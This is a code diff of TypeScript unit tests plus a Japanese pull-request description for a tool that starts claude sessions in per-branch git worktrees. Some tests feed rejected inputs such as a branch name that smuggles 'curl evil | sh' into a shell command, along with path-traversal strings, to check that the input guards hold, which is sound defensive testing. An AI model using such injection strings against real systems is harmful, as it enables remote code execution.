+    const s2 = manager.start(config, "thread-share-2", "feature-foo");
+    expect(s1.worktree!.path).toBe(s2.worktree!.path);
+
+    // Stopping the first must NOT remove the worktree — thread-share-2 still
+    // runs there (regression guard: CodeRabbit Major on PR #157).
+    await manager.stop("thread-share-1", "manual");
+    expect(effects.worktree.removeCalls).toHaveLength(0);
+    expect(effects.worktree.existingPaths.has(s1.worktree!.path)).toBe(true);
+
+    // Stopping the last session removes the now-unreferenced worktree.
+    await manager.stop("thread-share-2", "manual");
+    expect(effects.worktree.removeCalls).toEqual([
+      { mainRepoDir: config.dir, worktreePath: s2.worktree!.path },
+    ]);
+  });
+
   test("AC-6: two branches start in parallel as independent worktrees", () => {
     const a = manager.start(config, "thread-a", "feat-a");
     const b = manager.start(config, "thread-b", "feat-b");

--- a/supervisor/tests/session/manager.test.ts
+++ b/supervisor/tests/session/manager.test.ts
@@ -291,3 +291,104 @@ describe("buildClaudeFlags()", () => {
     ]);
   });
 });
+
+describe("SessionManager worktree integration (#154)", () => {
+  let manager: SessionManager;
+  let effects: FakeSessionEffects;
+  let config: ChannelConfig;
+
+  beforeEach(() => {
+    effects = createFakeEffects();
+    manager = new SessionManager({ effects, gracefulKillTimeoutMs: 0 });
+    config = makeChannelConfig({ channelName: "wt-channel" });
+  });
+
+  afterEach(async () => {
+    await manager.shutdownAll();
+  });
+
+  test("AC-1: start with branch creates a worktree and runs claude there", () => {
+    const session = manager.start(config, "thread-wt", "feature-foo");
+
+    expect(effects.worktree.ensureCalls).toEqual([
+      { mainRepoDir: config.dir, branch: "feature-foo" },
+    ]);
+    const wtPath = `${config.dir}/.claude/worktrees/feature-foo`;
+    expect(session.worktree).toEqual({
+      mainRepoDir: config.dir,
+      path: wtPath,
+      branch: "feature-foo",
+    });
+    expect(session.projectDir).toBe(wtPath);
+
+    // claude is launched with cwd = the worktree path (AC-1 verification).
+    const cmd = effects.tmux.getCommand("claude-thread-wt");
+    expect(cmd).toContain(`cd "${wtPath}"`);
+  });
+
+  test("start without branch keeps legacy behaviour (no worktree)", () => {
+    const session = manager.start(config, "thread-plain");
+
+    expect(session.worktree).toBeUndefined();
+    expect(session.projectDir).toBe(config.dir);
+    expect(effects.worktree.ensureCalls).toHaveLength(0);
+  });
+
+  test("AC-3 / Q4: a pre-existing worktree is reused", () => {
+    const wtPath = `${config.dir}/.claude/worktrees/feature-foo`;
+    effects.worktree.existingPaths.add(wtPath);
+
+    const session = manager.start(config, "thread-reuse", "feature-foo");
+    expect(session.worktree?.path).toBe(wtPath);
+    // ensure() was still consulted (it decides reuse), but no second creation.
+    expect(effects.worktree.ensureCalls).toHaveLength(1);
+  });
+
+  test("AC-5 / Q3: stop removes the worktree (branch preserved)", async () => {
+    const session = manager.start(config, "thread-stop-wt", "feature-foo");
+    const wtPath = session.worktree!.path;
+
+    await manager.stop("thread-stop-wt", "manual");
+
+    expect(effects.worktree.removeCalls).toEqual([
+      { mainRepoDir: config.dir, worktreePath: wtPath },
+    ]);
+  });
+
+  test("stop of a branchless session does not call worktree.remove", async () => {
+    manager.start(config, "thread-plain-stop");
+    await manager.stop("thread-plain-stop", "manual");
+    expect(effects.worktree.removeCalls).toHaveLength(0);
+  });
+
+  test("AC-6: two branches start in parallel as independent worktrees", () => {
+    const a = manager.start(config, "thread-a", "feat-a");
+    const b = manager.start(config, "thread-b", "feat-b");
+
+    expect(a.worktree?.path).toBe(`${config.dir}/.claude/worktrees/feat-a`);
+    expect(b.worktree?.path).toBe(`${config.dir}/.claude/worktrees/feat-b`);
+    expect(manager.count()).toBe(2);
+  });
+
+  test("a worktree creation failure aborts start and propagates", () => {
+    effects.worktree.failOnEnsure = true;
+    expect(() => manager.start(config, "thread-fail", "feature-foo")).toThrow(
+      /git worktree add failed/
+    );
+    // No session registered when worktree setup fails.
+    expect(manager.has("thread-fail")).toBe(false);
+  });
+
+  test("path-traversal / injection branch is rejected before a session starts", () => {
+    // The fake delegates to the real resolveWorktreePath, so the guard fires
+    // through the manager too.
+    expect(() => manager.start(config, "thread-trav", "../../evil")).toThrow(
+      /path traversal/
+    );
+    expect(() => manager.start(config, "thread-inj", 'foo"; id; echo "')).toThrow(
+      /使用できない文字/
+    );
+    expect(manager.has("thread-trav")).toBe(false);
+    expect(manager.has("thread-inj")).toBe(false);
+  });
+});

--- a/supervisor/tests/session/worktree.test.ts
+++ b/supervisor/tests/session/worktree.test.ts
@@ -1,0 +1,171 @@
+import { test, expect, describe, beforeEach } from "bun:test";
+import { resolve } from "path";
+import {
+  ensureWorktree,
+  removeWorktree,
+  resolveWorktreePath,
+  WORKTREE_SUBDIR,
+  type GitGhRunner,
+} from "../../src/session/worktree";
+
+/**
+ * Unit tests for the per-branch worktree logic (Issue #154). A fake
+ * {@link GitGhRunner} stands in for git/gh so these tests exercise the Q1/Q2/Q4
+ * branching without touching a real repo. The journey AC (issue body) maps to:
+ *   - AC-1 (unknown branch → worktree from default): "creates a new branch ..."
+ *   - AC-3 (existing worktree → reuse):              "reuses ..."
+ *   - AC-4 (empty branch → error):                   "rejects ..."
+ */
+
+class FakeRunner implements GitGhRunner {
+  existing = new Set<string>(); // worktree paths that already exist (Q4)
+  branches = new Set<string>(); // refs that resolve (Q1)
+  defaultBranchName = "main";
+  calls: string[] = [];
+
+  branchExists(_dir: string, branch: string): boolean {
+    this.calls.push(`branchExists:${branch}`);
+    return this.branches.has(branch);
+  }
+  defaultBranch(_dir: string): string {
+    this.calls.push(`defaultBranch`);
+    return this.defaultBranchName;
+  }
+  addWorktreeFromBranch(_dir: string, path: string, branch: string): void {
+    this.calls.push(`addFromBranch:${branch}`);
+    this.existing.add(path);
+  }
+  addWorktreeNewBranch(
+    _dir: string,
+    path: string,
+    branch: string,
+    base: string,
+  ): void {
+    this.calls.push(`addNewBranch:${branch}:${base}`);
+    this.existing.add(path);
+  }
+  removeWorktree(_dir: string, path: string): void {
+    this.calls.push(`remove:${path}`);
+    this.existing.delete(path);
+  }
+  pathExists(path: string): boolean {
+    return this.existing.has(path);
+  }
+}
+
+const REPO = "/Users/x/agent-base";
+
+describe("resolveWorktreePath", () => {
+  test("maps a simple branch to <repo>/.claude/worktrees/<branch>", () => {
+    expect(resolveWorktreePath(REPO, "feature-foo")).toBe(
+      resolve(REPO, WORKTREE_SUBDIR, "feature-foo"),
+    );
+  });
+
+  test("allows slash branch names as nested dirs", () => {
+    expect(resolveWorktreePath(REPO, "feat/foo")).toBe(
+      resolve(REPO, WORKTREE_SUBDIR, "feat/foo"),
+    );
+  });
+
+  test("rejects path traversal that escapes the worktrees root", () => {
+    expect(() => resolveWorktreePath(REPO, "../../../tmp/evil")).toThrow(
+      /path traversal/,
+    );
+  });
+
+  test("rejects empty / dot branch that resolves to the root itself", () => {
+    expect(() => resolveWorktreePath(REPO, ".")).toThrow(/不正/);
+  });
+
+  test("rejects shell-injection chars that would break out of cd \"<path>\"", () => {
+    // Each of these is dangerous inside the downstream `cd "<path>"` string.
+    for (const bad of [
+      'foo"; curl evil | sh; echo "',
+      "foo`id`",
+      "foo$HOME",
+      "foo\\bar",
+      "foo\nbar",
+    ]) {
+      expect(() => resolveWorktreePath(REPO, bad)).toThrow(/使用できない文字/);
+    }
+  });
+
+  test("allows ordinary ref punctuation (dash, dot, slash, underscore)", () => {
+    expect(() => resolveWorktreePath(REPO, "feat/foo-bar.v2_x")).not.toThrow();
+  });
+});
+
+describe("ensureWorktree", () => {
+  let runner: FakeRunner;
+  beforeEach(() => {
+    runner = new FakeRunner();
+  });
+
+  test("AC-1: unknown branch → creates worktree from default branch", () => {
+    runner.defaultBranchName = "main";
+    const result = ensureWorktree(REPO, "feature-foo", runner);
+
+    expect(result.reused).toBe(false);
+    expect(result.baseBranch).toBe("main");
+    expect(result.path).toBe(resolve(REPO, WORKTREE_SUBDIR, "feature-foo"));
+    expect(runner.calls).toContain("addNewBranch:feature-foo:main");
+  });
+
+  test("Q1: existing branch → checkout into worktree (no new branch)", () => {
+    runner.branches.add("existing-branch");
+    const result = ensureWorktree(REPO, "existing-branch", runner);
+
+    expect(result.reused).toBe(false);
+    expect(result.baseBranch).toBeUndefined();
+    expect(runner.calls).toContain("addFromBranch:existing-branch");
+    expect(runner.calls.some((c) => c.startsWith("addNewBranch"))).toBe(false);
+  });
+
+  test("AC-3 / Q4: existing worktree → reuse, no git add", () => {
+    const path = resolveWorktreePath(REPO, "feature-foo");
+    runner.existing.add(path);
+
+    const result = ensureWorktree(REPO, "feature-foo", runner);
+
+    expect(result.reused).toBe(true);
+    expect(result.path).toBe(path);
+    expect(runner.calls.some((c) => c.startsWith("add"))).toBe(false);
+  });
+
+  test("is idempotent: second ensure of the same branch reuses", () => {
+    ensureWorktree(REPO, "feature-foo", runner); // creates
+    const second = ensureWorktree(REPO, "feature-foo", runner);
+    expect(second.reused).toBe(true);
+  });
+
+  test("uses dynamic default branch (Q2: master/develop mixed repos)", () => {
+    runner.defaultBranchName = "develop";
+    const result = ensureWorktree(REPO, "new-feat", runner);
+    expect(result.baseBranch).toBe("develop");
+    expect(runner.calls).toContain("addNewBranch:new-feat:develop");
+  });
+
+  test("AC-4: empty / whitespace branch throws", () => {
+    expect(() => ensureWorktree(REPO, "", runner)).toThrow(/必須/);
+    expect(() => ensureWorktree(REPO, "   ", runner)).toThrow(/必須/);
+  });
+
+  test("trims surrounding whitespace from branch name", () => {
+    const result = ensureWorktree(REPO, "  feature-foo  ", runner);
+    expect(result.path).toBe(resolve(REPO, WORKTREE_SUBDIR, "feature-foo"));
+  });
+});
+
+describe("removeWorktree", () => {
+  test("delegates to the runner (Q3)", () => {
+    const runner = new FakeRunner();
+    const path = resolveWorktreePath(REPO, "feature-foo");
+    runner.existing.add(path);
+
+    removeWorktree(REPO, path, runner);
+
+    expect(runner.calls).toContain(`remove:${path}`);
+    expect(runner.pathExists(path)).toBe(false);
+  });
+});


### PR DESCRIPTION
## 概要

`/session start` を `/session start <branch>` 形式に変更し、branch ごとに専用 git worktree (`<projectDir>/.claude/worktrees/<branch>`) を作成・再利用してその中で claude を起動する。Closes #154。

設計判断 (Discord ブレスト 2026-05-24, Q1-Q6) は Issue 本文の通り。`claude -w` は Q1/Q2 を制御できないため、supervisor 側で `git worktree add/remove` を管理し claude には worktree path を cwd として渡す。

## 主な変更点

| ファイル | 内容 |
|---|---|
| `supervisor/src/session/worktree.ts` (新規) | Q1 既存 branch checkout / Q2 未存在 branch は repo default から派生 / Q4 既存 worktree 再利用。`GitGhRunner` 注入で unit test 化。path traversal + シェル injection ガード |
| `supervisor/src/session/adapters.ts` / `adapters-fake.ts` | `WorktreeAdapter` を `SessionEffects` に追加 (実装 / Fake) |
| `supervisor/src/session/manager.ts` | `start(config, threadId, branch?)` で worktree を cwd 化、`stop` で削除 (Q3) |
| `supervisor/src/commands/session.ts` | branch option + 空文字バリデーション (移行メッセージ) + welcome 表示 + 起動失敗時の orphan thread 削除 |
| `docs/bot-operations.md` | 運用シナリオを branch 必須仕様に更新 |

## セキュリティ / 設計上の判断

- **シェル injection 遮断**: branch 名は git の argv (`execFileSync`) に渡すため git 経路では injection 不可。さらに worktree path は `cd "<path>"` (tmux → `sh -c`) に埋め込まれるため、path 解決の choke point (`resolveWorktreePath`) で `"` `` ` `` `$` `\` と制御文字を含む branch 名を拒否する。
- **worktree 削除は `/session stop` のみ (Q3)**。claude の異常終了 (`tmux_exited`) や supervisor 再起動では worktree を**保持**する — `git worktree remove --force` が未コミット作業を消すため、明示的な teardown 以外では削除しない。保持した worktree は次回同 branch の `/session start` で Q4 再利用される。

## テスト

- `supervisor/tests/session/worktree.test.ts` (新規): Q1/Q2/Q4 分岐、traversal/injection 拒否、冪等性
- `supervisor/tests/session/manager.test.ts` (+): worktree 統合 (start/stop/並列/reuse/失敗/injection)
- `supervisor/tests/commands/session-start-branch.test.ts` (新規): AC-4 バリデーション、branch forward、orphan thread 削除
- 計 56 件追加・全 PASS、`bunx tsc --noEmit` clean
- full suite 332 pass / 4 fail。fail 4 件は `main` でも再現する tmux AC-7 系の real-tmux 競合で本 PR 起因の regression なし

## AC 検証 (統合ジャーニーAC)

| AC | 判定 | 手段 |
|---|---|---|
| AC-1 未存在 branch → default から worktree + claude 起動 | PASS | worktree/manager test (`cd "<wt>"` を検証) |
| AC-2 `git branch --show-current` → 指定 branch | ロジックPASS (`-b <branch>` 仕様、実 git E2E は deploy 後) |
| AC-3 同 branch 再 start → 再利用 | PASS | reuse test + `Reusing existing worktree` ログ |
| AC-4 branch なし → エラー・thread/session 作成なし | PASS | handler test |
| AC-5 `/session stop` → worktree 削除・branch 保持 | PASS | remove 呼び出し test (branch 保持は git 仕様) |
| AC-6 2 branch 並列 | PASS | parallel test |

> ライブ Discord + 実 git worktree の E2E は supervisor 再デプロイ後の手動検証項目 (本 PR では未実施)。

## 破壊的変更

引数なしの `/session start` は動作しなくなる (branch 必須化)。空引数時は移行メッセージ「`/session start <branch-name>` が新仕様です」を ephemeral で返す。


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

## リリースノート

* **新機能**
  * `/session start` コマンドに ブランチ引数が必須化。ブランチごとに独立した Git worktree を作成・管理できるようになり、複数ブランチを並列で開始可能に。既存 worktree は自動的に再利用されます。
  * セッション停止時、worktree は削除されブランチはリポジトリに保持される運用に変更。

* **ドキュメント**
  * Discord 運用手順を更新。ブランチ指定時の worktree 作成・再利用、セッション終了時の動作を明記。

* **テスト**
  * ブランチ別 worktree 管理のテストケースを追加。

<!-- review_stack_entry_start -->

[![Review Change Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/miyashita337/claude-hub/pull/157?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->